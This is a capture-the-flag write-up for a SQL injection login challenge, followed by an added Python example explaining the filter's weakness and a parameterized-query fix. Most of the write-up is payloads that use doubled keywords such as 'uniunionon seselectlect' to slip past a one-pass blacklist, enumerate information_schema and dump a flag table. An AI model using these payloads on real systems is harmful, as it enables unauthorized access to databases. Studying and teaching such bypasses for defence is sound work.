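The challenge hint says the input is filtered, so first try logging in with a "universal password".
The error message shows that or has been filtered out, so try bypassing the filter by writing the keyword twice (double-write bypass).
As expected, getting the flag is not that simple, so move on to injection.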
Guess the columns with the payload: ?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1
Another error, so union select must be filtered as well; bypass it by doubling the keywords.
payload: ?username=-1' uniunionon seselectlect 1,2,3 %23 &password=1'+oorr 1='1
Next, dump the current database name, payload: ?username=-1' uniunionon seselectlect 1,2,database() %23 &password=1'+oorr 1='1
Then look at the other database names, payload: ?username=-1' uniunionon seselectlect 1,2,group_concat(table_schema) from infoorrmation_schema.tables %23 &password=1'+oorr 1='1
from is filtered too; bypass it by doubling.
The rightmost entry in the output is named ctf; dump its table names.
payload: ?username=-1' uniunionon seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf' %23 &password=1'+oorr 1='1
The flag is definitely in this table.
Determine the column names, payload: ?username=-1' uniunionon seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf' aandnd table_name='Flag'%23 &password=1'+oorr 1='1
Finally, get the flag, payload: ?username=-1' uniunionon seselectlect 1,2,flag frfromom ctf.Flag %23 &password=1'+oorr 1='1
flag{151e9e1d-5cd1-4ba9-a36c-dc443466a92b}
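
Why the doubled keywords get through, and what the fix looks like, as an added example (not part of the original write-up or the challenge's source code). It assumes the challenge filter deletes blacklisted keywords in a single pass, which matches the behaviour seen above but is not shown on the page; the function names, the sqlite3 table and its contents are hypothetical.

```python
import re
import sqlite3

# Assumed blacklist: the keywords the write-up found to be filtered.
BLACKLIST = ["union", "select", "from", "where", "and", "or"]
_PATTERN = re.compile("|".join(BLACKLIST), re.IGNORECASE)

def strip_once(value: str) -> str:
    """Assumed model of the challenge filter: delete keywords in ONE pass."""
    return _PATTERN.sub("", value)

def strip_until_stable(value: str) -> str:
    """Repeat deletion until nothing changes; still a blacklist, still fragile."""
    while True:
        cleaned = _PATTERN.sub("", value)
        if cleaned == value:
            return cleaned
        value = cleaned

def login_parameterized(conn, username, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    cur = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    )
    return cur.fetchone()

def demo_db():
    """Constructed in-memory table standing in for the login backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return conn

if __name__ == "__main__":
    sample = "1' oorr 1='1"  # fragment taken from the write-up's payloads
    print(strip_once(sample))            # the keyword re-forms after one pass
    print(strip_until_stable(sample))    # keyword gone this time
    print(strip_until_stable("Orlando")) # but legitimate input is mangled too
    print(login_parameterized(demo_db(), "admin", "1' or 1='1"))
```

Looping the filter closes the double-write gap but still corrupts ordinary input and depends on the blacklist being complete; binding parameters removes the need for a keyword filter at all.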